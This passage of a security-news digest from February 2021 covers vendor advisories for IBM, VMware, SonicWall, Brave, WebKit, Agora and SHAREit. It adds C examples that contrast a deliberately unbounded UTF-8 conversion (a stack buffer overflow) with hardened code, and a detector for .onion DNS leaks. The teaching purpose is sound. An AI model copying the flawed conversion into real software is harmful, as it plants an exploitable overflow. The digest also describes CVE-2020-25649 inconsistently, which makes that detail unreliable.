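            dst[out++] = (unsigned char)(hi & 0xFF); dst[out++] = (unsigned char)(hi >> 8);
            dst[out++] = (unsigned char)(lo & 0xFF); dst[out++] = (unsigned char)(lo >> 8);
        } else {
            dst[out++] = (unsigned char)(cp & 0xFF); dst[out++] = (unsigned char)(cp >> 8);
        }
        i += k;
    }
    return (long)out;
}

int main(void)
{
    char longin[200];                                 /* constructed input: 200 ASCII bytes */
    memset(longin, 'a', sizeof longin);
    unsigned char stackbuf[STACK_BUF_BYTES];
    printf("flawed check says fits: %d, checked says fits: %d\n",
           flawed_fits_in_stack_buffer(longin, sizeof longin),
           checked_fits_in_stack_buffer(longin, sizeof longin));
    printf("bounded conversion result: %ld (refused, would need 400 bytes)\n",
           utf8_to_utf16le(longin, sizeof longin, stackbuf, sizeof stackbuf));
    return 0;
}
```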

IBM Integration Designer Affected
Specifically, CVE-2020-27221 exists in Eclipse OpenJ9, a high-performance, scalable, Java VM implementation that is fully compliant with JRE.

“Contributed to the Eclipse foundation by IBM, the OpenJ9 JVM underpins the IBM SDK, Java Technology Edition, which is a core component of many IBM Enterprise software products,” according to IBM.

IBM Integration Designer versions 8.5.7, 19.0.0.2, 20.0.0.1 and 20.0.0.2, which use JRE versions 7 and 8, are affected. The vulnerability was first reported on Dec. 16 via the Eclipse Foundation, which is a global community of Eclipse open source software development members. A fix can be found here for each affected version of IBM Integration Designer.

Another vulnerability (CVE-2020-14782) was fixed, stemming from the JRE implementation in IBM Integration Designer. This “unspecified” vulnerability existed in Java SE and was related to the Libraries component. However, according to IBM it had “no confidentiality impact, low integrity impact and no availability impact.”

IBM Planning Analytics Workspace High-Severity Flaws
IBM also patched a slew of high-severity flaws in its IBM Planning Analytics Workspace, a web-based interface for IBM Planning Analytics that is used to create and analyze content. The flaws exist specifically in Release 61 of the Local v2.0 for Planning Analytics Workspace.

Three vulnerabilities exist in Node.js, an open-source, cross-platform JavaScript runtime environment for developing server-side and networking applications, which is used in IBM Planning Analytics. These flaws include a denial-of-service vulnerability (CVE-2020-8251); an HTTP request-smuggling glitch (CVE-2020-8201); and a buffer-overflow error (CVE-2020-8252).

Another flaw (CVE-2020-25649) exists in FasterXML Jackson Databind, which is used to convert JSON to and from Plain Old Java Objects (POJOs) using property accessors or annotations.

The flaw “could provide weaker than expected security, caused by not having entity expansion secured properly,” according to IBM. “A remote attacker could exploit this vulnerability to launch XML external entity (XXE) attacks to have impact over data integrity.”

IBM Continues Security-Flaw Fix Campaign
IBM previously issued various fixes for vulnerabilities, including ones in Spectrum Protect Plus in September. This is Big Blue’s security tool that’s found under the umbrella of its Spectrum data storage software branding. The flaws could be exploited by remote attackers to execute code on vulnerable systems.

In August, a shared-memory flaw was discovered in IBM’s next-gen data-management software that researchers said could lead to other threats — as demonstrated by a new proof-of-concept exploit for the bug.

And in April, four serious security vulnerabilities in the IBM Data Risk Manager (IDRM) were identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis – and a proof-of-concept exploit is available.


VMware addresses a critical RCE issue in vCenter Server
24.2.2021
Vulnerebility  Securityaffairs

VMware addressed a critical remote code execution flaw, tracked as CVE-2021-21972, in vCenter Server virtual infrastructure management platform.
VMware has addressed a critical remote code execution (RCE) vulnerability in the vCenter Server virtual infrastructure management platform, tracked as CVE-2021-21972, that could be exploited by attackers to potentially take control of affected systems.

vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.

The flaw could be exploited by remote, unauthenticated attackers without user interaction.

“The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published. “A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.”
The CVE-2021-21972 issue was reported by Mikhail Klyuchnikov from Positive Technologies; it has received a CVSSv3 base score of 9.8/10 according to VMware’s security advisory.

The issue affects the vCenter Server plugin for vROPs, which is available in all default installations; vROPs does not need to be present for this endpoint to be available. The virtualization giant has provided workarounds to disable it.

The company recommends upgrading vulnerable vCenter Server installs to versions 6.5 U3n, 6.7 U3l, or 7.0 U1c as soon as possible.

VMware also provides step-by-step Workaround Instructions for CVE-2021-21972 and CVE-2021-21973 (KB82374 support document).

VMware also addressed an important heap-overflow flaw, tracked as CVE-2021-21974, in VMware ESXi. The issue can be exploited by attackers to execute arbitrary code remotely on vulnerable devices.


IBM addressed flaws in Java Runtime, Planning Analytics Workspace, Kenexa LMS
24.2.2021
Vulnerebility  Securityaffairs

IBM has released security patches to address high- and medium-severity vulnerabilities impacting some of its enterprise solutions.
IBM has released security updates to address several high- and medium-severity flaws affecting some of its enterprise products, including IBM Java Runtime, IBM Planning Analytics Workspace, and IBM Kenexa LMS On Premise.

Two issues, tracked as CVE-2020-14782 and CVE-2020-27221, affect the Java Runtime Environment versions 7 and 8 used in IBM Integration Designer.
IBM Integration Designer is a complete authoring environment that you use for end-to-end integration in your service-oriented architecture (SOA). Based on Eclipse, Integration Designer is a tool for building SOA-based business process management and integration solutions across Business Automation Workflow and WebSphere Adapters.

The most severe issue, tracked as CVE-2020-27221, is a stack-based buffer overflow that resides in Eclipse OpenJ9. The issue could be used by remote attackers to execute arbitrary code or cause an application crash.

“Eclipse OpenJ9 is vulnerable to a stack-based buffer overflow when the virtual machine or JNI natives are converting from UTF-8 characters to platform encoding. By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.” reads the advisory.

The vulnerability received a CVSS base score of 9.8.
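To make the bug class concrete, here is an added example (written for this digest, not code from IBM, Eclipse OpenJ9 or either advisory) of the failure mode described in the "What is a Buffer-Overflow Flaw?" section above and in the OpenJ9 advisory quoted here: a UTF-8 to platform-encoding conversion that writes into a fixed-size stack buffer. Latin-1 stands in for "platform encoding", and the function and buffer names are the example's own. The unbounded loop is the bug shape; the hardened form takes the destination size and rejects overly long or malformed input instead of writing past the buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decode one UTF-8 sequence from s (len bytes available) into *cp.
 * Returns the number of bytes consumed (1..4), or 0 for a malformed,
 * overlong, truncated or out-of-range sequence. */
static size_t utf8_decode_one(const unsigned char *s, size_t len, uint32_t *cp)
{
    if (len == 0) return 0;
    unsigned char b0 = s[0];
    size_t n;
    uint32_t c;
    if (b0 < 0x80) { *cp = b0; return 1; }
    if ((b0 & 0xE0) == 0xC0)      { n = 2; c = b0 & 0x1F; }
    else if ((b0 & 0xF0) == 0xE0) { n = 3; c = b0 & 0x0F; }
    else if ((b0 & 0xF8) == 0xF0) { n = 4; c = b0 & 0x07; }
    else return 0;
    if (len < n) return 0;
    for (size_t i = 1; i < n; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;
        c = (c << 6) | (uint32_t)(s[i] & 0x3F);
    }
    if ((n == 2 && c < 0x80) || (n == 3 && c < 0x800) || (n == 4 && c < 0x10000))
        return 0;                                   /* overlong form */
    if (c > 0x10FFFF || (c >= 0xD800 && c <= 0xDFFF))
        return 0;                                   /* out of range / surrogate */
    *cp = c;
    return n;
}

/* BUG SHAPE (illustration only): the conversion loop with no bound on the
 * destination. A fixed-size stack buffer passed here is overrun as soon as
 * the input decodes to more bytes than the buffer holds. */
void utf8_to_latin1_unbounded(const char *in, char *out)
{
    const unsigned char *s = (const unsigned char *)in;
    size_t in_len = strlen(in), pos = 0, written = 0;
    while (pos < in_len) {
        uint32_t cp;
        size_t n = utf8_decode_one(s + pos, in_len - pos, &cp);
        if (n == 0) break;
        out[written++] = (cp <= 0xFF) ? (char)cp : '?';   /* no size check */
        pos += n;
    }
    out[written] = '\0';
}

/* Hardened form: the caller states the destination size and the function
 * refuses, rather than overruns, when the converted text would not fit.
 * Returns the number of bytes written (excluding the NUL), or -1 on
 * malformed input or insufficient space. */
int utf8_to_latin1(const char *in, char *out, size_t out_size)
{
    const unsigned char *s = (const unsigned char *)in;
    size_t in_len = strlen(in), pos = 0, written = 0;
    if (out_size == 0) return -1;
    while (pos < in_len) {
        uint32_t cp;
        size_t n = utf8_decode_one(s + pos, in_len - pos, &cp);
        if (n == 0) return -1;                      /* reject malformed input */
        if (written + 1 >= out_size) return -1;     /* leave room for the NUL */
        out[written++] = (cp <= 0xFF) ? (char)cp : '?';
        pos += n;
    }
    out[written] = '\0';
    return (int)written;
}

/* Typical call site: a small fixed-size stack buffer. With the hardened
 * function an overly long string is rejected instead of smashing the stack. */
int convert_into_stack_buffer(const char *in)
{
    char buf[16];
    return utf8_to_latin1(in, buf, sizeof buf);
}

int main(void)
{
    printf("short input: %d\n", convert_into_stack_buffer("caf\xC3\xA9"));
    printf("long input : %d\n",
           convert_into_stack_buffer("this string is far too long for the buffer"));
    return 0;
}
```

The decoder also rejects overlong and truncated sequences, which matters because a converter that trusts a malformed length byte can miscount how many output bytes it is about to produce even when a size check is present.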

The CVE-2020-14782 flaw affects Java SE’s Libraries component and could be exploited by attackers to compromise Java SE via multiple protocols.

“An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact.” reads the advisory published by IBM.

Big Blue also published an advisory to report five vulnerabilities in the Planning Analytics Workspace, which is a component of Planning Analytics, a collaboration and management planning product.

The most severe issues are CVE-2020-8251 and CVE-2020-25649, a denial-of-service and a buffer-overflow issue respectively. Both received a CVSS base score of 7.5.

The IT giant also addressed five low-impact vulnerabilities in IBM Kenexa LMS On Premise, which is an enterprise learning management system.


SonicWall releases second firmware update for SMA 100 vulnerability
21.2.2021
Vulnerebility  Securityaffairs

Security provider SonicWall released a new firmware update for an SMA-100 zero-day vulnerability that was exploited in attacks.
SonicWall has released a second firmware update for the SMA-100 zero-day vulnerability that was exploited in attacks in the wild.

SonicWall disclosed a security breach on January 22, blaming sophisticated threat actors for the intrusion.

On January 29, SonicWall announced it was investigating the presence of a zero-day vulnerability in its Secure Mobile Access (SMA) gateways.

NCC Group first disclosed the attacks on SonicWall devices but did not provide details about the flaw exploited by the threat actors.

The vulnerability, tracked as CVE-2021-20016, has been rated as critical and received a CVSS score of 9.8.
The vulnerability results in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product; it could be exploited by a remote, unauthenticated attacker for credential access on SMA100 build version 10.x.

“A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker. This vulnerability impacts SMA100 build version 10.x.” reads the advisory.

In early February, SonicWall released the first firmware update (version 10.2.0.5-29sv) to address an actively exploited zero-day vulnerability in Secure Mobile Access (SMA) 100 series appliances.

This week, SonicWall released new firmware updates for SMA-100 series appliances and urged customers to install them as soon as possible.

The company declared that the security updates include additional security enhancements.
“Following up on the Feb. 3 firmware update outlined below, SonicWall is announcing the availability of new firmware versions for both 10.x and 9.x code on the SMA 100 series products, comprised of SMA 200, 210, 400, 410 physical appliances and the SMA 500v virtual appliance.” reads the security advisory.

“SonicWall conducted additional reviews to further strengthen the code for the SMA 100 series product line. The new SMA 10.2 firmware includes:

Code-hardening fixes identified during an internal code audit
Rollup of customer issue fixes not included in the Feb. 3 patch
General performance enhancements
Previous SMA 100 series zero-day fixes posted on Feb. 3
The new 9.0 firmware includes:

Code-hardening fixes identified during an internal code audit”
The updates are available for the following devices:

Physical Appliances: SMA 200, SMA 210, SMA 400, SMA 410
Virtual Appliances: SMA 500v (Azure, AWS, ESXi, HyperV)


Privacy Bug in Brave Browser Exposes Dark-Web Browsing History of Its Users
21.2.2021
Vulnerebility  Thehackernews

Brave has fixed a privacy issue in its browser that sent queries for .onion domains to public internet DNS resolvers rather than routing them through Tor nodes, thus exposing users' visits to dark web websites.

The bug was addressed in a hotfix release (V1.20.108) made available yesterday.

Brave ships with a built-in feature called "Private Window with Tor" that integrates the Tor anonymity network into the browser, allowing users to access .onion websites, which are hosted on the darknet, without revealing the IP address information to internet service providers (ISPs), Wi-Fi network providers, and the websites themselves. The feature was added in June 2018.

This is achieved by relaying users' requests for an onion URL through a network of volunteer-run Tor nodes. At the same time, it's worth noting that the feature uses Tor just as a proxy and does not implement most of the privacy protections offered by Tor Browser.

But according to a report first disclosed on Ramble, the privacy-defeating bug in the Tor mode of the browser made it possible to leak all the .onion addresses visited by a user to public DNS resolvers.

"Your ISP or DNS provider will know that a request made to a specific Tor site was made by your IP," the post read.

DNS requests, by design, are unencrypted, meaning that any request to access .onion sites in Brave can be tracked, thereby defeating the very purpose of the privacy feature.

This issue stems from the browser’s CNAME ad-blocking feature, which blocks third-party tracking scripts that use CNAME DNS records to pose as first-party scripts and so evade content blockers. With this technique, a website can cloak third-party scripts behind subdomains of its main domain, which are then redirected automatically to a tracking domain.

Brave, for its part, already had prior knowledge of the issue, for it was reported on the bug bounty platform HackerOne on January 13, following which the security issue was resolved in a Nightly release 15 days ago.

It appears that the patch was originally scheduled to roll out in Brave Browser 1.21.x, but in the wake of public disclosure, the company said it's pushing it to the stable version of the browser released yesterday.

Brave browser users can head to Menu on the top right > About Brave to download and install the latest update.


Privacy bug in the Brave browser exposes Tor addresses to user’s DNS provider
20.2.2021
Vulnerebility  Securityaffairs

A privacy bug in the Brave Browser caused the leak of the Tor onion URL addresses visited in the Tor mode by the users.
A bug in the Private Window with Tor implemented in the Brave web browser could reveal the onion sites visited by the users.

The Tor mode implemented in the Brave web browser allows users to access .onion sites inside Brave private browsing windows.

When users are inside a Private Window with Tor, Brave doesn’t connect directly to a website, instead, it connects to a chain of three different computers in the Tor network.
An anonymous researcher initially reported that Brave’s Tor mode was sending queries for .onion domains to public internet DNS resolvers, and other experts confirmed the findings.

“If you’re using Brave you probably use it because you expect a certain level of privacy/anonymity. Piping .onion requests through DNS where your ISP or DNS provider can see that you made a request for an .onion site defeats that purpose.” explained the researcher. “Anyhow, it was reported by a partner that Brave was leaking DNS requests for onion sites and I was able to confirm it at the time.”

Every such query is recorded in the DNS server’s logs, exposing the Tor traffic of Brave web browser users.

The Brave development team addressed the bug in the Brave Nightly version shortly after its public disclosure, and the fix will be released to the stable version with the next Brave browser update.

According to the development team, the privacy bug resides in the internal ad blocker component of the Brave web browser. The component was using DNS queries to determine if a site was attempting to bypass the ad-blocking features, but the problem is that it performed the same checks for .onion addresses.
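As an added illustration (example code, not Brave's implementation) of the two points made in the 21.2.2021 and 20.2.2021 Brave reports above, here is the policy a privacy feature or stub resolver should apply before any name leaves the machine, plus the detection side: a scan of constructed resolver log lines for .onion lookups, which in a public resolver's log are evidence of precisely this kind of leak. The RFC 7686 rule that .onion names must not be resolved through DNS is real; the log line format, the host names and the function names are assumptions of the example.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* True when `name` is in the special-use TLD ".onion" (RFC 7686), ignoring
 * case and an optional trailing root dot. */
bool is_onion_name(const char *name)
{
    static const char tld[] = "onion";
    size_t tld_len = sizeof tld - 1;
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '.') len--;          /* "x.onion." */
    if (len < tld_len) return false;
    for (size_t i = 0; i < tld_len; i++)
        if (tolower((unsigned char)name[len - tld_len + i]) != tld[i])
            return false;
    /* "onion" must be a whole label: the entire name or preceded by a dot */
    return len == tld_len || name[len - tld_len - 1] == '.';
}

typedef enum { DNS_FORWARD, DNS_REFUSE_ONION } dns_policy;

/* Policy a stub resolver or a privacy feature should apply before a name
 * leaves the machine: .onion names are never sent to a public resolver. */
dns_policy dns_query_policy(const char *name)
{
    return is_onion_name(name) ? DNS_REFUSE_ONION : DNS_FORWARD;
}

/* The CNAME-cloaking check described in the articles needs a DNS lookup for
 * ordinary hosts; for .onion hosts it must be skipped entirely, because the
 * lookup itself is the leak. Returns true when a lookup may be issued. */
bool cname_check_may_resolve(const char *host)
{
    return dns_query_policy(host) == DNS_FORWARD;
}

/* Detection side: count .onion lookups in resolver log text. Lines follow a
 * constructed format "<date> <time> query: <name> IN <type>"; any .onion hit
 * in a public resolver's log points at exactly this kind of leak. */
int count_onion_queries(const char *log)
{
    int count = 0;
    const char *p = log;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t line_len = eol ? (size_t)(eol - p) : strlen(p);
        char line[512];
        if (line_len >= sizeof line) line_len = sizeof line - 1;
        memcpy(line, p, line_len);
        line[line_len] = '\0';
        const char *q = strstr(line, "query: ");
        if (q) {
            char name[256];
            if (sscanf(q + 7, "%255s", name) == 1 && is_onion_name(name))
                count++;
        }
        p = eol ? eol + 1 : p + line_len;
    }
    return count;
}

/* Constructed sample log (not real traffic); two of the four lines leak. */
const char SAMPLE_LOG[] =
    "2021-02-19 10:00:01 query: www.example.com IN A\n"
    "2021-02-19 10:00:02 query: abcdefghijklmnop.onion IN A\n"
    "2021-02-19 10:00:03 query: ads.tracker.example.net IN CNAME\n"
    "2021-02-19 10:00:04 query: SOMEHIDDENSERVICE.ONION. IN AAAA\n";

int main(void)
{
    printf(".onion queries that leaked: %d\n", count_onion_queries(SAMPLE_LOG));
    return 0;
}
```

The suffix test deliberately requires "onion" to be a whole label, so a host such as onion.example.com is still forwarded while NAME.ONION. (with the root dot, in any case) is refused.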


Stored XSS Vulnerability on iCloud.com Earned Researcher $5,000
19.2.2021
Vulnerebility  Securityweek

A bug bounty hunter claims he has earned a $5,000 reward from Apple for reporting a stored cross-site scripting (XSS) vulnerability on iCloud.com.

Vishal Bharad, a researcher and penetration tester from India, published a blog post earlier this week describing his findings. Bharad said he had attempted to find cross-site request forgery (CSRF), insecure direct object reference (IDOR), logic bugs and other types of issues on Apple’s icloud.com website, but ultimately ended up discovering a stored XSS flaw.

The vulnerability was present in the iCloud-hosted versions of Apple’s Pages and Keynote software. Exploitation involved creating a new document or presentation and entering an XSS payload into its name field.

The attacker would then need to share a link to the malicious document or presentation with the targeted user and convince them to access the “Browse All Versions” feature from the “Settings” menu. Once the victim clicked on “Browse All Versions,” the attacker’s malicious payload was executed in their browser.

Bharad said he reported his findings to Apple in August 2020 and in October the tech giant informed him that the security hole had earned him $5,000.

The researcher has published a blog post detailing his findings, as well as a video showing how an attack worked.

XSS vulnerabilities can have a significant impact, which is why companies such as Google, Facebook and Tesla have paid out tens of thousands of dollars for these types of flaws.

Bug bounty platform HackerOne reported last year that its members had earned more than $4 million for XSS vulnerabilities.


ScamClub malvertising gang abused WebKit zero-day to redirect to online gift card scams
18.2.2021
Vulnerebility  Securityaffairs

Malvertising gang ScamClub has exploited an unpatched zero-day vulnerability in WebKit-based browsers in a campaign aimed at realizing online gift card scams.
The Malvertising gang ScamClub has abused an unpatched zero-day vulnerability in WebKit-based browsers to bypass security measures and redirect users from legitimate sites to websites hosting online gift card scams.

The malvertising campaign was first spotted in June 2020 and is still ongoing, even though the flaw was addressed with the release of security updates early this month.

“A typical ScamClub payload has a few layers to it, starting with an ad tag that loads a malicious CDN hosted dependency. This of course is usually obfuscated in absurd ways in an attempt to evade url blocklists.” reads the analysis published by the security firm Confiant.

The group has been active since 2018 and has mainly targeted iOS users with malicious ads that often redirected them to sites hosting online scams. The landing pages were designed to trick victims into providing their financial information.

In the most recent campaign, ScamClub hackers used a new technique to bypass the iframe HTML sandboxing mechanism. The iframe sandboxing is a defense measure that prevents the malicious code from interacting with the underlying website.

The malvertising gang abused a bug in how the Webkit browser engine handles JavaScript event listeners to redirect users from legitimate sites to malicious domains that were hosting gift card scams.
“The `allow-top-navigation-by-user-activation` sandbox attribute, which is often lauded as one of the most vital tools in an anti-malvertising strategy should in theory prevent any redirection unless a proper activation takes place. Activation in this context typically means a tap or a click inside the frame.” continues the analysis.

“This means our proof of concept shouldn’t work under any circumstances. The clickMe button is outside of the sandboxed frame after all. However, if it does redirect, that means we have a browser security bug on our hands, which turned out to be the case when tested on WebKit based browsers, namely Safari on desktop and iOS.”

The trick abused by the threat actors in these malvertising campaigns only worked with browsers using the open-source WebKit engine, such as Apple’s Safari and Google Chrome for iOS.

The experts reported that over the last 90 days the ScamClub gang has delivered over 50 million malicious impressions, alternating a low baseline of activity with frequent manic bursts. The experts observed a peak of 16 million impacted ads being served in a single day.

Below is the disclosure timeline:
June 22, 2020 — Confiant Security Team observes event listeners in ScamClub redirect payload.
June 23, 2020 — Bug report submitted to Apple Security. Google Chrome team also notified (Chrome on iOS uses WebKit).
Dec 2, 2020 — Patched https://trac.webkit.org/changeset/270373/webkit
Feb 1, 2021 — CVE assigned and published as part of Apple’s security update: https://support.apple.com/en-us/HT212147
Confiant researchers also released Indicators of Compromise (IoCs) in STIX format.


Agora SDK Bug Left Several Video Calling Apps Vulnerable to Snooping
18.2.2021
Vulnerebility  Thehackernews
A severe security vulnerability in a popular video calling software development kit (SDK) could have allowed an attacker to spy on ongoing private video and audio calls.

That's according to new research published by the McAfee Advanced Threat Research (ATR) team today, which found the aforementioned flaw in Agora.io's SDK used by several social apps such as eHarmony, Plenty of Fish, MeetMe, and Skout; healthcare apps like Talkspace, Practo, and Dr. First's Backline; and in the Android app that's paired with the "temi" personal robot.

California-based Agora is a video, voice, and live interactive streaming platform, allowing developers to embed voice and video chat, real-time recording, interactive live streaming, and real-time messaging into their apps. The company's SDKs are estimated to be embedded into mobile, web, and desktop applications across more than 1.7 billion devices globally.

McAfee disclosed the flaw (CVE-2020-25605) to Agora.io on April 20, 2020, following which the company released a new SDK on December 17, 2020, to remediate the threat posed by the vulnerability.

The security weakness, which is the consequence of incomplete encryption, could have been leveraged by bad actors to launch man-in-the-middle attacks and intercept communications between two parties.

"Agora's SDK implementation did not allow applications to securely configure the setup of video/audio encryption, thereby leaving a potential for hackers to snoop on them," the researchers said.

Specifically, the function responsible for connecting an end user to a call passed parameters such as the App ID and the authentication token in plaintext, allowing an attacker to sniff network traffic, gather call information, and then launch their own Agora video application to stealthily dial into calls without the attendees' knowledge.

Although there's no evidence that the vulnerability was exploited in the wild, the development once again underscores the need for securing applications to safeguard user privacy.

"In the world of online dating, a breach of security or the ability to spy on calls could lead to blackmail or harassment by an attacker," the researchers concluded. "Other Agora developer applications with smaller customer bases, such as the temi robot, are used in numerous industries such as hospitals, where the ability to spy on conversations could lead to the leak of sensitive medical information."

It's highly recommended that developers using Agora SDK upgrade to the latest version to mitigate the risk.


Popular SHAREit app is affected by severe flaws yet to be fixed
17.2.2021
Vulnerebility  Securityaffairs

Multiple vulnerabilities in the popular file-sharing app SHAREit have yet to be addressed, experts from Trend Micro warned.
SHAREit is a popular file-sharing Android app with more than one billion downloads; experts from Trend Micro discovered multiple unpatched vulnerabilities in its code.

The vulnerabilities impact the Android version of SHAREit, a mobile app that allows users to share files with friends or between personal devices.

The vulnerabilities can be abused to leak a user’s sensitive data and execute arbitrary code with SHAREit permissions by using malicious code or a malicious app. They can also potentially lead to Remote Code Execution (RCE) on the devices where the app is installed.

“We discovered several vulnerabilities in the application named SHAREit. The vulnerabilities can be abused to leak a user’s sensitive data and execute arbitrary code with SHAREit permissions by using a malicious code or app.” reads the report published by Trend Micro. “They can also potentially lead to Remote Code Execution (RCE).”

The analysis of the app’s code revealed that potentially any app can call the startActivity() function through the broadcast receiver “com.lenovo.anyshare.app.DefaultReceiver.” An attacker can view arbitrary activities, including SHAREit’s internal (non-public) and external app activities.

Experts also discovered that any third-party entity can still gain temporary read/write access to the FileProvider content provider’s data.

“SHAREit also defines a FileProvider. The developer behind this disabled the exported attribute via android:exported="false", but enabled the android:grantUriPermissions="true" attribute. This indicates that any third-party entity can still gain temporary read/write access to the content provider’s data.” continues the analysis.

“Even worse, the developer specified a wide storage area root path. In this case, all files in the /data/data/<package> folder can be freely accessed.”
The app also provides a feature that can install an APK with the file name suffix sapk; an attacker could potentially abuse this feature to install a malicious app.

“If such is the case, it will enable a limited RCE when the user clicks on a URL.” continues the analysis. “To verify whether the above functionality is available in the Google Chrome browser, we built an href attribute in HTML. When the user clicks this download URL, Chrome will call SHAREit to download the sapk from http://gshare.cdn.shareitgames.com. Since it supports the HTTP protocol, this sapk can be replaced by simulating a man-in-the-middle (MitM) attack.”

Trend Micro reported the vulnerabilities to the company behind the app but did not receive any reply, and after three months decided to disclose them.


WebKit Zero-Day Vulnerability Exploited in Malvertising Operation
17.2.2021
Vulnerebility  Securityweek

A malvertising operation observed last year by advertising cybersecurity company Confiant exploited what turned out to be a zero-day vulnerability in the WebKit browser engine.

Confiant researchers discovered the security hole while analyzing a campaign carried out by a threat actor they call ScamClub. The group has been around for several years, launching malvertising attacks designed to redirect users to a wide range of scam websites promising prizes.

ScamClub specializes in high-volume operations — even if most of their payloads are blocked, a large number still reach users.

“Over the last 90 days, ScamClub has delivered over 50MM malicious [ad] impressions, maintaining a low baseline of activity augmented by frequent manic bursts — with as many as 16MM impacted ads being served in a single day,” Confiant said in a blog post on Tuesday.

The “allow-top-navigation-by-user-activation” attribute in WebKit’s iframe sandboxing feature is designed to prevent malicious redirections by only allowing a redirection to occur when it’s triggered by user actions (e.g. a click or a tap inside the frame).

However, Confiant discovered that the ScamClub threat actor managed to bypass this iframe sandboxing mechanism by using an event listener for a “message” event. If the event listener picks up a message, it would trigger the redirect, which increases the chances of users being redirected to their scam websites without actually clicking inside their iframe to directly trigger the redirect.


“In modern web applications, messages are flying around all the time, usually with wildcard destinations, often on user interaction,” Confiant explained.

“Combined with ScamClub’s large volumes and broad targeting that hits dozens of different websites, it’s all about the increased efficacy of spawning a successful redirect — even if we’re talking about a single digit percentage increase, that can mean tens of thousands of impacted impressions over the duration of a single campaign,” the company added.

Confiant spotted the campaign exploiting the vulnerability in June 2020 and immediately reported its findings to Apple, whose Safari browser uses WebKit, and Google, whose Chrome browser on iOS also uses WebKit.

The issue was addressed in WebKit in December 2020, and Apple included the patch in the versions of WebKit delivered with updates released for iOS and macOS earlier this month. Apple tracks the issue as CVE-2021-1801 and claims to have addressed it with “improved iframe sandbox enforcement.”


Several Vulnerabilities Found in Popular File Sharing App SHAREit
17.2.2021
Vulnerebility  Securityweek

Researchers have discovered several vulnerabilities in the SHAREit Android application, including flaws that could expose sensitive user data and allow remote code execution.

SHAREit, originally made by Chinese tech giant Lenovo, is a popular cross-platform file sharing app currently developed by Smart Media4U Technology. The company was initially based in Beijing, China, but recently moved its commercial headquarters to Singapore. Wikipedia now describes it as a global technology company in Singapore.

SHAREit is one of the dozens of Chinese mobile apps banned last year by India due to national security and privacy concerns.

Cybersecurity firm Trend Micro reported on Monday that its researchers discovered some potentially serious vulnerabilities in the SHAREit app for Android, which has been installed from Google Play more than one billion times.

Trend Micro disclosed its findings in a blog post containing technical information about each issue, as well as proof-of-concept (PoC) exploit code.

According to the company, the vulnerabilities found in SHAREit can be exploited by malicious applications installed on the targeted user’s device to overwrite files associated with SHAREit and execute arbitrary code, download and install other malicious applications on the smartphone, and obtain sensitive user data from the device. Users have been warned that such an attack is not easy to detect.

Trend Micro said it reported its findings to both Google and SHAREit developers. The cybersecurity firm decided to disclose its findings after the vendor failed to respond after being notified more than three months ago.

SHAREit for Android was last updated on February 9, but it’s unclear if any of the flaws have been patched. SecurityWeek has reached out to Smart Media4U for comment.

SHAREit developers do not appear to have a good track record when it comes to addressing vulnerability reports. Information security consultancy firm RedForce in 2019 disclosed a couple of vulnerabilities found by its employees in the SHAREit app for Android. The flaws were patched after roughly 10 weeks, but RedForce said “communication with SHAREit team was not a good experience at all; Not only they took too long to respond to our messages, they also were not cooperative in any means and we did not feel that our work or efforts were appreciated at all.”


VMware fixes command injection issue in vSphere Replication
16.2.2021 
Vulnerebility  Securityaffairs

VMware released security patches for a potentially serious vulnerability affecting the vSphere Replication product.
VMware has recently released security patches to address a serious command injection vulnerability, tracked as CVE-2021-21976, in its vSphere Replication product.

VMware vSphere Replication is an extension to VMware vCenter Server that provides hypervisor-based virtual machine replication and recovery. vSphere Replication is an alternative to storage-based replication.
The vulnerability can be exploited by an attacker with admin privileges to execute shell commands on the underlying system.

“vSphere Replication contains a post-authentication command injection vulnerability in “Startup Configuration” page.” reads the advisory published by the virtualization giant. “A malicious actor with administrative access in vSphere Replication can execute shell commands on the underlying system. Successful exploitation of this issue may allow authenticated admin user to perform a remote code execution.”

The CVE-2021-21976 flaw has been rated as ‘Important’ and received a CVSSv3 base score of 7.2.

The vulnerability was discovered by the researcher Egor Dimitrenko from Positive Technologies.


Vendor Ships Unofficial Patch for IE Zero-Day Vulnerability
16.2.2021 
Vulnerebility  Securityweek

Slovenia-based cybersecurity research company ACROS Security last week announced the release of an unofficial micro-patch for a zero-day vulnerability in Microsoft Internet Explorer (IE) that North Korean hackers are believed to have exploited in a campaign targeting security researchers.

South Korean security vendor ENKI published a report on the IE zero-day in early February, claiming that North Korean hackers leveraged it to target its researchers with malicious MHTML files leading to drive-by downloads of malicious payloads.

Microsoft has confirmed receiving a report on the vulnerability through an “incorrect channel,” and said that it was committed to investigate the report and deliver a patch as soon as possible.

However, a fix for this zero-day was not included in the security updates that Microsoft released last week as part of its February 2021 Patch Tuesday.

On Thursday, ACROS Security announced that an unofficial patch for the vulnerability is now available through its 0patch service.

“We have just issued the first batch of micropatches for the Internet Explorer HTML Attribute nodeValue Double Free 0day, which affects all Windows workstations and servers from (at least) Windows 7 and Server 2008 R2 to the very latest supported versions, even if fully updated,” the company announced.

The company said that for the release of this patch it worked together with ENKI, which shared their proof-of-concept to help with the development of a fix.

“The vulnerability is a double free, triggered by making Internet Explorer clear an HTML Attribute value twice,” ACROS Security revealed.

The exploit that ENKI discovered leads to the execution of arbitrary code inside Internet Explorer when the user visits a malicious website, and does not require additional user interaction.

IE’s usage is low, but the browser is still present on Windows computers and is set as the default application for opening MHT/MHTML files. Furthermore, the browser is used internally within a large number of organizations and can execute HTML content inside Windows applications, ACROS notes.

